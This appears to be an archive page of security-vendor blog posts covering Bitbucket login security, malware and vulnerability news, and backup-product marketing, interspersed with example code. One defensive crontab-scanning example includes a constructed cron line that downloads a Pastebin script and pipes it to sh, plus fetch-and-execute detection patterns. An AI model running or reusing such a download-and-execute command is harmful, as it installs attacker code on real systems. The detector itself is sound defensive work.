Increasing login security

Creating strong login credentials for user accounts is critical in preventing malicious access to your account. Nevertheless, there are many ways hackers would try to gain access to your accounts, with social techniques and phishing on the top.

Having a strong password is a great starting point. A strong password should contain a mix of lowercase and uppercase letters, special characters and numbers. But the strength of a password doesn’t lie only in its complexity, but rather in using a unique one for each and every account you have. Let’s pretend you created an unbreakable password for one website and then used it on every other one. A security breach happens, that password is now compromised, and hackers can gain access to every account on which you set that password.

Single sign-on for Bitbucket security

The need to remember each and every password you create might seem challenging. That is why BitBucket suggests using a Single sign-on (SSO). This makes it possible to access network services as well as all resources associated with it, with the help of one set of login data. The user simply logs into his SSO portal, from which he easily obtains access to all applications without another authentication.

Can you rely on it? It depends. In this case, the strength of SSO equals the strength of our credentials. Only in conjunction with an appropriate password administration policy, and ideally tokenization, is it much more secure than logging in each time with weak passwords that are reused across various services.

With a growing number of cloud services used in the workspace, an SSO allows users to have just-in-time provisioning, centralized management of authentication policies, and automatic lockout when a user is deactivated from an SSO provider. 

Bitbucket allows you to log in with a G Suite, or if you have a subscription to Atlassian Access, you can connect with any identity provider you see fit.

Two-step verification in Bitbucket

The other good practice is to force a two-step verification in addition to your password. It guarantees that your account stays secure even if your password is compromised. To enable this two-step verification in Bitbucket you need: 

  • An authentication app on your mobile device or desktop (such as Authy, Duo, Google Authenticator for Android/iOS, or Microsoft Authenticator for Windows mobile)
  • Confirmed email and password on your Atlassian account
  • An SSH key assigned to your account. 

Actually, you can use any application which supports the Time-based One-time Password (TOTP) algorithm. You can also use security keys – hardware devices – as your second verification step.

To make it work you also need to enable two-step verification within your Bitbucket account (avatar -> Personal settings -> Security -> Two-step verification) and confirm it by providing your password.

Setting such a method requires the user not only to enter the correct password for his account but also to provide another step of verification.

Please keep in mind that if a user forgets the password and loses access to the second factor, it would be much more difficult to recover the access to his account.
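The authenticator apps listed above all implement the same standard, so it is worth seeing what the second factor actually computes. The following is an added example, not Atlassian's or Bitbucket's code: a standard-library implementation of HOTP (RFC 4226) and TOTP (RFC 6238), plus a verifier that tolerates a little clock drift and uses a constant-time comparison. The seed `RFC_SEED` is the reference value from the RFC test vectors, not a real account secret.

```python
"""TOTP as used by authenticator apps (RFC 6238 over RFC 4226 HOTP).

Added example, not Bitbucket's implementation. Standard library only.
"""
import base64
import hashlib
import hmac
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """HMAC-based one-time password (RFC 4226) for a given counter value."""
    msg = struct.pack(">Q", counter)               # 8-byte big-endian counter
    mac = hmac.new(secret, msg, algo).digest()
    offset = mac[-1] & 0x0F                        # dynamic truncation offset
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, at: int, step: int = 30, digits: int = 6, algo=hashlib.sha1) -> str:
    """Time-based OTP (RFC 6238): HOTP over the number of `step`-second periods since the epoch."""
    return hotp(secret, at // step, digits, algo)


def verify_totp(secret: bytes, code: str, at: int, window: int = 1,
                step: int = 30, digits: int = 6, algo=hashlib.sha1) -> bool:
    """Accept the code for the current period and `window` periods on either side.

    The phone and the server clocks are rarely in perfect sync, so a window of
    one step is the usual compromise. compare_digest keeps the comparison
    constant-time so the check itself leaks nothing about the expected code.
    """
    for delta in range(-window, window + 1):
        candidate = totp(secret, at + delta * step, step, digits, algo)
        if hmac.compare_digest(candidate, code):
            return True
    return False


def secret_from_base32(encoded: str) -> bytes:
    """Decode the base32 seed that an authenticator app imports from the QR code."""
    cleaned = encoded.strip().replace(" ", "").upper()
    cleaned += "=" * (-len(cleaned) % 8)           # restore padding if it was stripped
    return base64.b32decode(cleaned)


# RFC 4226 / RFC 6238 reference seed (ASCII "12345678901234567890"). Test vectors
# in RFC 6238 use 8 digits; real apps and Bitbucket use 6.
RFC_SEED = b"12345678901234567890"

if __name__ == "__main__":
    now = int(time.time())
    print("6-digit code for the RFC seed right now:", totp(RFC_SEED, now))
    print("verifies:", verify_totp(RFC_SEED, totp(RFC_SEED, now), now))
```

The shared secret is the whole security of the scheme: whoever holds the seed can compute every future code, which is why the note above about losing the second factor matters and why recovery codes should be stored as carefully as a password.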

Atlassian bug bounty enforcing Bitbucket security

Atlassian operates a public bug bounty program for their products via their partner, Bugcrowd. It helps its security team to find breaches within their systems, to make sure vulnerabilities and bugs are found first by the “good guys” before the hackers can find and use them with malicious intent. Security researchers can receive cash payments in exchange for a qualifying vulnerability report submitted to Atlassian. Depending on the scale of the bug the monetary rewards vary. The average payout for a problem found in the last 3 months (at the time of writing this article) is $568.

Xopero’s way to ensure Bitbucket security

Whether or not you think Bitbucket security is sufficient, it’s a fact that your business would be in very big trouble if an attack struck your intellectual property. Accidental deletion of a branch or a ransom attack targeted at your repositories – it doesn’t matter which – you need to make sure that your data is recoverable and accessible so your employees can get back to work as soon as possible, minimizing the risk of business interruption. Having a proper backup of your repositories ensures that you will be able to recover your code at any point in time and get back to work immediately.

Protect your intellectual property with Xopero ONE Backup and Recovery for BitBucket:

  • Backup with every push or according to schedule – just set it and forget it
  • Instant, stress-free recovery – get back to code immediately
  • Predefined backup plans or advanced customization possibilities
  • Backup servers, repositories, and metadata – both local and cloud
  • Unlimited scalability – simply add new repositories
  • Keep data on-premise or in the cloud – Amazon, Azure, etc. – choose your storage
  • Manage it all with the most user-friendly console and data-driven interface
  • Advanced retention schemes – FIFO or GFS – choose yours

and many more…

Purple Fox malware has gained new and alarming worm capabilities

Welcome to the next episode of the Xopero Security Center. This week we are taking a break from MS Exchange and ProxyLogon vulnerabilities. Except maybe for this small update: according to Microsoft, 92% of vulnerable Exchange servers are now patched or mitigated. But Microsoft’s ecosystems are profitable targets and attackers take advantage of newer vulnerabilities to infect systems over and over again. Thus, this time we are taking a closer look into an upgraded variant of Purple Fox malware with worm capabilities that targets Microsoft Windows machines. Which ones exactly? To find out more, read the full post.

Purple Fox malware with new worm capabilities targets exposed Windows systems

Purple Fox is malware previously distributed via exploit kits and phishing emails. It has now gained a worm module that allows it to scan for and infect Windows systems reachable over the Internet in ongoing attacks. The malware was first spotted in 2018, but starting in May 2020 Purple Fox attacks intensified significantly, reaching a total of 90,000 attacks and 600% more infections. Check yourself:

[Figure: Purple Fox attack statistics. Image: Guardicore Labs]

Infected systems exhibit worm-like behaviour

After discovering an exposed Windows system while scanning for devices reachable over the Internet, Purple Fox’s newly added worm module uses SMB password brute force to infect it. So far, Purple Fox has deployed its malware droppers and additional modules on an extensive network of bots, an army of almost 2,000 compromised servers. Devices ensnared in this botnet include Windows Server machines running IIS version 7.5 and Microsoft FTP, and servers running Microsoft RPC, Microsoft SQL Server 2008 R2, Microsoft HTTPAPI httpd 2.0, and Microsoft Terminal Service.

Purple Fox also uses phishing campaigns and web browser vulnerabilities to deploy its payloads. It installs a rootkit module that uses the open-source “Hidden” rootkit to hide dropped files, folders and Windows registry entries created on the infected systems. After deploying the rootkit and rebooting the device, the malware renames its DLL payload to match a Windows system DLL and configures it to be launched on system start.

Once the malware is executed on system launch, each infected system exhibits the same worm-like behaviour, continuously scanning the Internet for other targets and attempting to compromise them and add them to the botnet.

Source

Fleeceware scam earns cybercriminals $400M in revenue so far – it could cost you 3,400 USD per year, every year…

About 204 different fleeceware applications with combined billion+ downloads have raked in more than $400 million in revenue so far, via the Apple App Store and Google Play.

What is a Fleeceware app?

Fleeceware apps generally offer users a free trial to “test” the app, before commencing automatic payments that can be exorbitant. In an analysis from Avast released on Wednesday, some of those subscriptions can reach $3,400 or more per year. And often, users are charged even after they’ve deleted the offending application.

The study

Avast analysed over 200 mobile applications – and then flagged them to Apple and Google – and found that most of the offending apps are musical instrument apps, palm readers, image editors, camera filters, fortune tellers, QR code and PDF readers, and something called “slime simulators”. Clearly, many of these apps are marketed towards children. Scammers target children mostly through catchy advertisements on popular social media platforms such as Facebook, Instagram, Snapchat and TikTok – promising ‘free installation’ or ‘free download’. Most of the apps that Avast discovered offer a free three-day trial, according to the research. After that, the models vary. Most of the apps charge between $4 and $12 per week, which equates to $208 to $624 per year; but others charge as much as $66 per week, totalling $3,432 per year.

Uninstalling is an option but it doesn’t help

Fleeceware apps are not malware, but in this case users deal with a quasi-permanent state of “infection”. Neither Google nor Apple is responsible for subscription refunds after a certain time period, leaving victims with the app developers themselves as their main recourse. And scammers usually don’t cooperate with victims – that’s the unwritten law. So it appears there is very little that victims can do other than contacting their bank and requesting a chargeback.

Fleeceware apps will stay for some time, so be aware

In January, Sophos research uncovered that these types of apps have been installed nearly 600 million times on 100 million-plus devices, from Google Play alone. This business model is attracting more and more developers – there is big money guaranteed even if only a small percentage of users fall victim to fleeceware.

Source

Critical F5 BIG-IP flaw under active attack. Patch ASAP!

Attackers are exploiting a recently-patched, critical vulnerability in F5 devices that have not yet been updated. The unauthenticated remote command execution flaw (CVE-2021-22986) exists in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure and could allow attackers to take full control over a vulnerable system. And it’s worth noting that the F5 BIG-IP is a very juicy target due to the fact that it can handle highly sensitive data.

Earlier in March, F5 issued a patch for the flaw, which has a CVSS rating of 9.8 and exists in the iControl REST interface. After the patch was issued, several researchers posted proof-of-concept (PoC) exploit code after reverse engineering the Java software patch in BIG-IP. Fast forward to last week, when researchers reported mass scanning for – and in-the-wild exploitation of – the flaw.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged companies to fix the critical F5 flaw, along with another bug being tracked as CVE-2021-22987 (rating 9.9) which affects the infrastructure’s Traffic Management User Interface (TMUI). The scenario is particularly urgent as F5 provides enterprise networking to some of the largest tech companies in the world, including Facebook, Microsoft and Oracle, as well as to a trove of Fortune 500 companies.

Source

WARNING: A new Android zero-day vulnerability is under active attack

Google has disclosed that a now-patched vulnerability affecting Android devices that use Qualcomm chipsets is being weaponized by adversaries to launch targeted attacks. Tracked as CVE-2020-11261 (CVSS score 8.4), the flaw concerns an “improper input validation” issue in Qualcomm’s Graphics component. It could be exploited to trigger memory corruption when an attacker-engineered app requests access to a huge chunk of the device’s memory. The flaw was discovered and reported by Google’s Android Security team in July 2020, and Qualcomm fixed it in January 2021.

[Image source: The Hacker News]

It’s worth noting that to launch a successful attack, the bad actor must either have physical access to the vulnerable smartphone or use other means – e.g., a watering hole – to deliver malicious code and set off the attack chain. Specifics about the attacks, the identity of the attacker, and the targeted victims have not been disclosed. Better install the update now so you don’t end up on that list.

Source

Microsoft releases a one-click ProxyLogon mitigation tool

Welcome to the next episode of the Xopero Security Center. Race against time – that’s the best description of the ProxyLogon situation. First Microsoft released emergency patches for vulnerable systems. No more than a week later researchers spotted the first ransomware actively exploiting these vulnerabilities. Now users have a one-click ProxyLogon mitigation tool (details below). The keyword is “mitigation” – it mitigates the risk of exploitation until the update is applied. This is not an alternative to patching. The good news – tens of thousands of Microsoft Exchange servers have been patched already. Experts have never seen patch rates this high for any system before. Still, there are about 82k devices vulnerable to the attack. Hence the new tool. Need to find out more? Check the rest of the article.

With this new one-click mitigation tool you can check if ProxyLogon vulnerabilities got to you too

Microsoft has released the one-click Exchange On-premises Mitigation Tool (EOMT) to allow small business owners to easily check if their servers are vulnerable to the ProxyLogon vulnerabilities. Recent statistics show that at least 82,000 internet-facing servers are still unpatched and vulnerable to attack. There is still work to do, hence the new tool. The EOMT has been designed to help customers that might not have security or IT staff on hand and has been tested across Exchange Server 2013, 2016, and 2019.

It is important to note the tool is not an alternative to patching but should be considered a means to mitigate the risk of exploit until the update has been applied as quickly as possible. 

The ‘EOMT.ps1’ script can be downloaded from Microsoft’s GitHub repository, and when executed, will automatically perform the following tasks:

  • Mitigates the CVE-2021-26855 Server-Side Request Forgery (SSRF) vulnerability by installing the IIS URL Rewrite module and a regular expression rule that aborts any connection containing the ‘X-AnonResource-Backend’ and ‘X-BEResource’ cookie headers.
  • Downloads and runs the Microsoft Safety Scanner to remove known web shells and other malicious scripts installed via these vulnerabilities. The script will then remove any malicious files found.

Additionally, admins are advised to also check for indicators of compromise (IOC) in Exchange HttpProxy logs, Exchange log files, and Windows Application event logs.
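The cookie names that the rewrite rule aborts on are also the simplest indicator to look for in historical request logs. The following is an added example, not Microsoft's EOMT code and not a parser for the real Exchange HttpProxy log layout: the request records and their field names (`time`, `client`, `url`, `cookie`) are constructed assumptions, and the IPs and cookie values are placeholders. The check itself, `is_proxylogon_probe`, works on any Cookie header string, so it can be plugged into whatever log parser you already have.

```python
"""Flag requests whose Cookie header carries the ProxyLogon indicator cookie names.

Added example, not Microsoft's code. The record format below is constructed; only
the two cookie names come from the mitigation description.
"""
from typing import Dict, List

# Cookie names the EOMT rewrite rule aborts on, lower-cased for matching.
IOC_COOKIE_NAMES = {"x-anonresource-backend", "x-beresource"}


def cookie_names(cookie_header: str) -> List[str]:
    """Return the cookie names in a Cookie request header, lower-cased.

    The header is 'name=value; name2=value2'; values may themselves contain '=',
    so only the text before the first '=' of each part is the name. Names are
    case-sensitive in the Cookie spec, but for an indicator match a
    case-insensitive comparison avoids trivial evasion by casing.
    """
    names = []
    for part in cookie_header.split(";"):
        name = part.strip().partition("=")[0].strip()
        if name:
            names.append(name.lower())
    return names


def is_proxylogon_probe(cookie_header: str) -> bool:
    """True when any cookie name is one of the indicators (the same test the rewrite rule applies)."""
    return any(name in IOC_COOKIE_NAMES for name in cookie_names(cookie_header))


def scan_requests(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply the check to already-parsed request records and return the matches."""
    return [r for r in records if is_proxylogon_probe(r.get("cookie", ""))]


# Constructed sample records (assumed field names; IPs from documentation ranges;
# cookie values are placeholders, not captured payloads).
SAMPLE_REQUESTS = [
    {"time": "2021-03-16T10:01:02Z", "client": "203.0.113.10", "url": "/owa/auth/logon.aspx",
     "cookie": "ASP.NET_SessionId=abc123; X-OWA-CANARY=deadbeef"},
    {"time": "2021-03-16T10:01:09Z", "client": "198.51.100.7", "url": "/ecp/default.flt",
     "cookie": "X-BEResource=placeholder-value; other=1"},
    {"time": "2021-03-16T10:02:30Z", "client": "198.51.100.7", "url": "/owa/auth/x.js",
     "cookie": "X-AnonResource=true; X-AnonResource-Backend=placeholder-value"},
    {"time": "2021-03-16T10:03:00Z", "client": "192.0.2.44", "url": "/owa/",
     "cookie": ""},
]

if __name__ == "__main__":
    for rec in scan_requests(SAMPLE_REQUESTS):
        print(f"{rec['time']} {rec['client']} {rec['url']} -> indicator cookie present")
```

Note that `X-AnonResource=true` on its own is not flagged: only the two names from the mitigation are indicators, and a name-based check avoids the false positives a substring search on the whole header would produce.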

Source: 1 | 2

New Mirai variant targets SonicWall, D-Link, Netgear and IoT devices

A new variant of the Mirai botnet has been discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear and SonicWall devices — as well as never-before-seen flaws in unknown internet-of-things (IoT) gadgets.

The attacks leverage a number of vulnerabilities. The known vulnerabilities exploited include: a SonicWall SSL-VPN exploit; a D-Link DNS-320 firewall exploit (CVE-2020-25506); Yealink Device Management remote code-execution (RCE) flaws (CVE-2021-27561 and CVE-2021-27562); a Netgear ProSAFE Plus RCE flaw (CVE-2020-26919); an RCE flaw in Micro Focus Operation Bridge Reporter (CVE-2021-22502); and a Netis WF2419 wireless router exploit (CVE-2019-19356).

Patches are available for all of these flaws; the botnet is targeting devices that have not yet applied the available updates.

After successfully compromising a device, the attacker dropped various binaries that let them schedule jobs, create filter rules, run brute-force attacks, or propagate the botnet malware. 

The variant is only the latest to rely on Mirai’s source code, which has proliferated into more than 60 variants since bursting on the scene with a massive distributed denial of service (DDoS) takedown of DNS provider Dyn in 2016.

Source: 1 | 2

The curious case of disappearing/deleting Microsoft Teams and SharePoint files

On Monday, Microsoft suffered a massive outage that affected almost all cloud services, including Microsoft 365, Microsoft Teams, Xbox Live, Exchange Online, Outlook.com, and SharePoint. The outage was caused by a configuration issue in the Azure Active Directory service.

That was on Monday… Since Tuesday, numerous Microsoft SharePoint administrators face a new problem – missing files in their clients’ SharePoint folders. The SharePoint folder structure is still intact, but most or sometimes all of the files are missing. Where did they go? A short investigation showed that these files had been deleted and are now located in SharePoint’s cloud recycle bin, or in some cases, a local PC’s Recycle Bin.

The root of the problem

Microsoft confirmed that the issues are related to its advisories SP244708 (SharePoint) and OD244709 (OneDrive). Both advisories are essentially the same and state that local copies of OneDrive for Business or SharePoint files will be restored after initiating a resync. The cause for both issues is the same as well – Monday’s Azure Active Directory (AAD) outage.

While each advisory states that the outage has caused local data to become unavailable, neither advisory explains why the files are being deleted from SharePoint’s cloud folders and why users continue to see this happening after the outage has been resolved.

And… it is still not the end. To make matters worse numerous Microsoft Teams Free users report that files shared on their channels are no longer accessible on either the desktop or web client.

[Image: Bleeping Computer]

According to Microsoft Teams Engineering PM Sam Cosby, his team found the cause for the missing files and would be applying mitigations as soon as they can. He did not share what was causing the users’ files to go missing in the first place.

Source

New CopperStealer malware hijacks social media accounts

Researchers with Proofpoint released details on new undocumented malware called CopperStealer. It steals social media logins and spreads more malware.

CopperStealer has many of the same targeting and delivery methods as SilentFade, a Chinese-sourced malware family first reported by Facebook in 2019.

The CopperStealer malware attempts to steal the account passwords to Facebook, Instagram, Google, and other major service providers, according to Proofpoint. The stolen passwords are used to run malicious ads for profit and spread more malware.

Researchers were first alerted to the malware sample in late January. The earliest discovered samples date back to July 2019. 

According to Proofpoint they also identified additional versions that target other major service providers, including Apple, Amazon, Bing, Google, PayPal, Tumblr and Twitter. 

How to protect your social media accounts against CopperStealer? Better turn on two-factor authentication as soon as possible. 

Source

Git Repository Backup: third-party software or your own script

When it comes to files, endpoints, servers or VMs, third-party backup software is something obvious that nearly every business needs and should have. Repository backup is not so obvious, but it is of equal importance. As a CTO, IT manager, software-house owner or team leader, you can probably imagine how much it would cost you to lose the code your team has been working on for months… if not, try to calculate…

Repository backup – why do you need it?

Data breaches, systems downtime, malware, malicious employee, human errors, policy changes, and more – all of those factors can limit access to your repositories and put your intellectual property at risk. Even if you use such trusted Git-based source code repository hosting services provided by Microsoft or Atlassian, you still are at risk of losing data.

In previous articles, we described reasons to back up repositories – both in GitHub and Bitbucket. So if you still need convincing – go there, read the articles, and come back within a few minutes.

Managing your own repository backup – pros and cons

Managing backups in-house obligates you to manage all the infrastructure, processes, ongoing maintenance, and repair costs to make your internal backups. While in the beginning, it might seem cost-effective, in a long-term perspective maintenance cost and working hours of the employees managing backups can cost you a fortune.

PRO: Full control & customization

Managing your own repository backups lets you decide how they should work to meet your company’s requirements and specifications. You know how they should integrate with other elements of your business. Finally, you know what kind of data you want to protect, how often the backup should run, and how: you can customize it.

CON: Responsibility, distraction, and high long-term costs

If you want to make your own backups you have to dedicate internal employees to work on them, test them on a regular basis, maintain them, and implement some form of data retention; otherwise somebody has to remember to manually remove older backup copies to make room for new ones. Even if it is just a part-time job for one employee, it distracts them from their core duties. And now let’s assume that you sacrificed that employee’s time and you finally have your own backup script. Somebody now has to test it and maintain it as part of their routine. As with most software, in the backup case most of the cost occurs after implementation.

Moreover, if a failure occurs and your backup script fails too, so that you cannot restore the data, the only person you can blame is yourself. Or at least your management will. Are you sure you need this additional responsibility on your shoulders?
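To make concrete what a self-managed script of the kind discussed above has to cover, here is an added example (not from this article and not Xopero’s code): it mirror-clones each repository, verifies the copy with git fsck before counting it as a backup, and applies a retention policy instead of relying on someone to delete old copies by hand. The repository URL and backup root are placeholders, and git is assumed to be on PATH.

```python
import re
import shutil
import subprocess
from datetime import date, datetime
from pathlib import Path

# Constructed placeholders: replace with your own repository URLs and backup root.
REPOS = ["https://github.com/example-org/example-repo.git"]
BACKUP_ROOT = Path("/var/backups/git")
KEEP_DAYS = 30     # keep every copy from the last 30 days...
KEEP_WEEKS = 12    # ...plus the Monday copy of each of the last 12 weeks
# Snapshot directories are named <repo>-<YYYY-MM-DD>.
SNAPSHOT_RE = re.compile(r"^(?P<repo>.+)-(?P<day>\d{4}-\d{2}-\d{2})$")


def mirror_repo(url: str, snapshot_dir: Path) -> bool:
    """Clone a full mirror (all refs) and verify it with git fsck.
    A copy that does not verify must not count as a backup."""
    snapshot_dir.parent.mkdir(parents=True, exist_ok=True)
    clone = subprocess.run(["git", "clone", "--mirror", "--quiet", url, str(snapshot_dir)])
    if clone.returncode != 0:
        return False
    fsck = subprocess.run(["git", "-C", str(snapshot_dir), "fsck", "--full"],
                          capture_output=True)
    return fsck.returncode == 0


def snapshots_to_prune(names, today, keep_days=KEEP_DAYS, keep_weeks=KEEP_WEEKS):
    """Retention policy: returns the snapshot names that may be deleted.
    Keeps copies younger than keep_days, Monday copies younger than keep_weeks,
    always the newest copy per repo, and ignores names it did not create."""
    if isinstance(today, str):
        today = date.fromisoformat(today)
    by_repo = {}
    for name in names:
        m = SNAPSHOT_RE.match(name)
        if m:
            day = datetime.strptime(m["day"], "%Y-%m-%d").date()
            by_repo.setdefault(m["repo"], []).append((day, name))
    prune = []
    for copies in by_repo.values():
        copies.sort()
        newest = copies[-1][1]
        for day, name in copies:
            age = (today - day).days
            keep = (name == newest or age <= keep_days
                    or (day.weekday() == 0 and age <= keep_weeks * 7))
            if not keep:
                prune.append(name)
    return sorted(prune)


def run_backup(today=None) -> dict:
    """Take today's snapshot of every repo, then apply retention. Returns repo -> verified."""
    today = today or date.today()
    results = {}
    for url in REPOS:
        repo = url.rstrip("/").rsplit("/", 1)[-1]
        repo = repo[:-4] if repo.endswith(".git") else repo
        results[repo] = mirror_repo(url, BACKUP_ROOT / f"{repo}-{today.isoformat()}")
    existing = [p.name for p in BACKUP_ROOT.iterdir() if p.is_dir()]
    for name in snapshots_to_prune(existing, today):
        shutil.rmtree(BACKUP_ROOT / name)
    return results
```

Run `run_backup()` from a daily cron job; a `False` in the returned dict means that day’s copy of that repository failed to clone or verify and needs attention.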

Third-party repository backup – pros and cons

When you buy a third-party repository backup, you know what you are paying for: taking the responsibility off your shoulders, saving your employees’ time so they can focus on their core duties, reducing maintenance and administration costs, and a data protection guarantee. The higher initial cost looks pretty slight once you consider it over the long term. It turns out to be a small investment for peace of mind…

PRO: All the best of a backup solution

A third-party repository backup solution such as Xopero ONE Backup & Recovery lets you protect all your GitHub and Bitbucket data, whichever of those hosting services you use. You can back up all GitHub and Bitbucket servers, repositories, and metadata, both local and cloud, including comments, pull requests, milestones, issues, wikis and much more.

With a dedicated repository backup you also benefit from the years of experience of a backup vendor that protects all kinds of mission-critical data, including files, endpoints, servers, virtual machines, SaaS, etc. (which, by the way, you can take advantage of as well).

So, besides repository-specific features, you also get the core features of a mature backup product, such as:

  • any storage compatibility (you can store your copies on SMB network shares, local disk resources, public clouds)
  • full automation (“set-and-forget”) and central management
  • predefined backup plans or advanced plan customization (so you can adjust backup performance to your company’s requirements and specification)
  • a wide range of recovery options (including granular, point-in-time, and cross-user recovery)

Even if you assign your best developers to write a backup script, they will probably not be able to deliver features as advanced and secure as a professional backup provider’s, nor give you the same guarantee of data accessibility and recoverability.

PRO: Repository backup security and recovery guarantee

Speaking of best practices: for all professional third-party backup providers, security is an integral part of their DNA. They need to make sure the data is protected, recoverable, and accessible at any time and as fast as you need it. As your business probably relies on software and digital assets more than ever before, make sure the repository backup software you use provides encryption (AES is desirable), zero-knowledge encryption, and a web-based architecture with no single point of failure. Additionally, if something is wrong with your copy, you should be informed about it through daily reports, logs, and dedicated notifications.

CON: Limited control

As with any third-party software, you have no control over future changes to its pricing or terms of service. So you should consider what matters more to you: third-party software with limited control but a team focused on solving core business problems, or preparing and maintaining your own backup procedures, over which you have full control, at the cost of your internal developers’ valuable time.

PRO: Lower long-term costs

You might think a third-party repository backup solution is an expensive option. But try to calculate how much you are going to pay for preparing internal repository protection procedures and backup scripts. Then add the hours your employee spends on maintenance, testing, and administration, plus the opportunity cost: how much value that employee would bring you while doing their normal work instead. And of course, you only have their word that your data is secure. I bet the higher initial cost seems pretty slight now: the long-term cost of a third-party backup solution looks more attractive, and your employees can focus on what they are best at, their work.

PRO: Meeting the shared responsibility model

Whether you use GitHub or Bitbucket: like most SaaS providers, both rely on a shared responsibility model. In short, the service provider is responsible for the accessibility and availability of its platform, while you, as the data owner, are responsible for protecting your data. Are you sure your own internal solution is safe enough? Have you considered every possible scenario of losing your data? Finally, have you tested it? With a third-party backup solution you share this burden: an external company is now also responsible for keeping your data safe.

Conclusion

If you can make your own pizza, why do you normally buy it instead? Well, probably because this way you get it faster and better, well baked and tasty, and delivered to your door. And at the very least, no one will blame you for any stomach problems. So why would you want to make your own backup solution and take responsibility for something as crucial as your business data?

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, points of sale, resellers, and partner companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which includes Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.


Z0Miner malware / DearCry ransomware and ProxyLogon exploits / reCAPTCHA phishing

Welcome to the next episode of the Xopero Security Center. This time we are taking a closer look at the Z0Miner malware case, a new threat against unpatched ElasticSearch and Jenkins servers. MS Exchange servers are under attack too. Remember the four new zero-day vulnerabilities discovered a few weeks ago? They have a fancy name now, ProxyLogon, and a very effective ransomware, DearCry, is targeting vulnerable servers. What’s next? There is also a novel phishing attack that uses a fake Google reCAPTCHA to swipe Microsoft 365 credentials. And there were some problems with the GitHub login mechanism. Details can be found below.

Unpatched ElasticSearch and Jenkins servers are now easy prey for z0Miner botnet

A cryptomining botnet discovered last year is now taking control of Jenkins and ElasticSearch servers to mine for Monero (XMR) cryptocurrency.

z0Miner, spotted in November 2020 by the Tencent Security Team, has been infecting thousands of servers by exploiting a WebLogic security vulnerability. Now, the attackers have upgraded the malware to scan for and attempt to infect new devices by exploiting remote command execution (RCE) vulnerabilities affecting ElasticSearch and Jenkins servers:

  • an ElasticSearch RCE vulnerability tracked as CVE-2015-1427
  • an older RCE vulnerability affecting Jenkins servers

After compromising a server, the malware first downloads a malicious shell script that hunts for and kills previously deployed cryptominers. Next, it sets up a new cron entry to periodically grab and execute malicious scripts from Pastebin. The next stage of the infection flow downloads a mining kit containing an XMRig miner script, a config file, and a starter script, and starts mining cryptocurrency in the background.

Last year attackers were able to compromise and take over 5,000 servers. After a short break, z0Miner botnet activity started picking up again in mid-January.

Image: 360 Netlab

Specialists recommend that ElasticSearch and Jenkins users check their systems and update them in time, check for abnormal processes and network connections, and monitor and block unexpected IPs and URLs.
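A defender-side check for the persistence step described above, as an added example that is not from the original post or from the cited researchers: it parses crontab entries and flags jobs that download remote content and execute it, with paste-site downloads called out separately. The sample crontab is constructed, and the paste ID in it is a placeholder.

```python
import re
from dataclasses import dataclass, field

# Download tools, and the patterns by which fetched content typically ends up executed.
FETCH_RE = re.compile(r"\b(curl|wget)\b", re.I)
EXEC_RE = re.compile(r"\|\s*(ba|da)?sh\b|\b(ba)?sh\s+/(tmp|dev/shm)/|\bchmod\s+\+x\b", re.I)
PASTE_RE = re.compile(r"\bpastebin\.com/raw\b", re.I)
# An @keyword schedule, or five schedule fields, followed by the command.
CRON_RE = re.compile(r"^(?P<sched>@\w+\s+|(\S+\s+){5})(?P<cmd>.+)$")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: list = field(default_factory=list)


def cron_findings(crontab_text: str):
    """Flag crontab entries that pull remote content and execute it, the persistence
    pattern described above. Comments and VAR=value lines are skipped."""
    findings = []
    for no, raw in enumerate(crontab_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_RE.match(line)
        if not m:
            continue
        cmd = m["cmd"]
        reasons = []
        if FETCH_RE.search(cmd) and EXEC_RE.search(cmd):
            reasons.append("downloads remote content and executes it")
        if PASTE_RE.search(cmd):
            reasons.append("fetches from a paste site")
        if reasons:
            findings.append(Finding(no, m["sched"].strip(), cmd, reasons))
    return findings


# Constructed sample crontab: a legitimate backup job, a monitoring agent, and one
# entry shaped like the persistence described above (PLACEHOLDER is not a real paste).
CONSTRUCTED_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
0 3 * * * /usr/local/bin/backup.sh --quiet
*/10 * * * * (curl -fsSL https://pastebin.com/raw/PLACEHOLDER || wget -qO- https://pastebin.com/raw/PLACEHOLDER) | sh
@reboot /opt/monitoring/agent start
"""

if __name__ == "__main__":
    for f in cron_findings(CONSTRUCTED_CRONTAB):
        print(f"line {f.line_no} [{f.schedule}] {f.command}\n   -> {', '.join(f.reasons)}")
```

Feed it the output of `crontab -l` for each user and the files under /etc/cron.d to review every scheduled job on a host.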

Source

Novel phishing attack uses fake Google reCAPTCHA to swipe your Microsoft 365 credentials

The phishing emails pretend to be automated emails from victims’ unified communications tools, which say that they have a voicemail attachment. For instance, one email tells users that “(503) ***-6719 has left you a message 35 second(s) long on Jan 20” along with a lone attachment that’s titled “vmail-219.HTM.” Another tells email recipients to “REVIEW SECURE DOCUMENT.”

Image: Zscaler

When the victims click on the attachment, they encounter the fake Google reCAPTCHA screen, which contains a typical reCAPTCHA box.

The emails first take recipients to a fake Google reCAPTCHA system page. Google reCAPTCHA is a service that helps protect websites from spam and abuse, by using a Turing test to tell humans and bots apart (through asking a user to click on a fire hydrant out of a series of images, for instance).

Once victims “pass” the reCAPTCHA test, they are redirected to a phishing landing page which asks for their Office 365 credentials. Attackers have done their homework and are customizing their phishing landing pages to fit their victims’ profile, in order to make the attack appear more legitimate. In this step, victims are asked to input their credentials into the system. Once they do so, a message tells them that the validation was successful. Users are then shown a recording of a voicemail message that they can play, allowing the threat actors to avoid suspicion.

Who is the main target?

This time the attackers are aiming at Vice Presidents and Managing Directors, who are likely to have a higher degree of access to sensitive company data. According to researchers, at least 2,500 such emails have been sent to senior-level employees in the banking and IT sector over the past three months.

Source

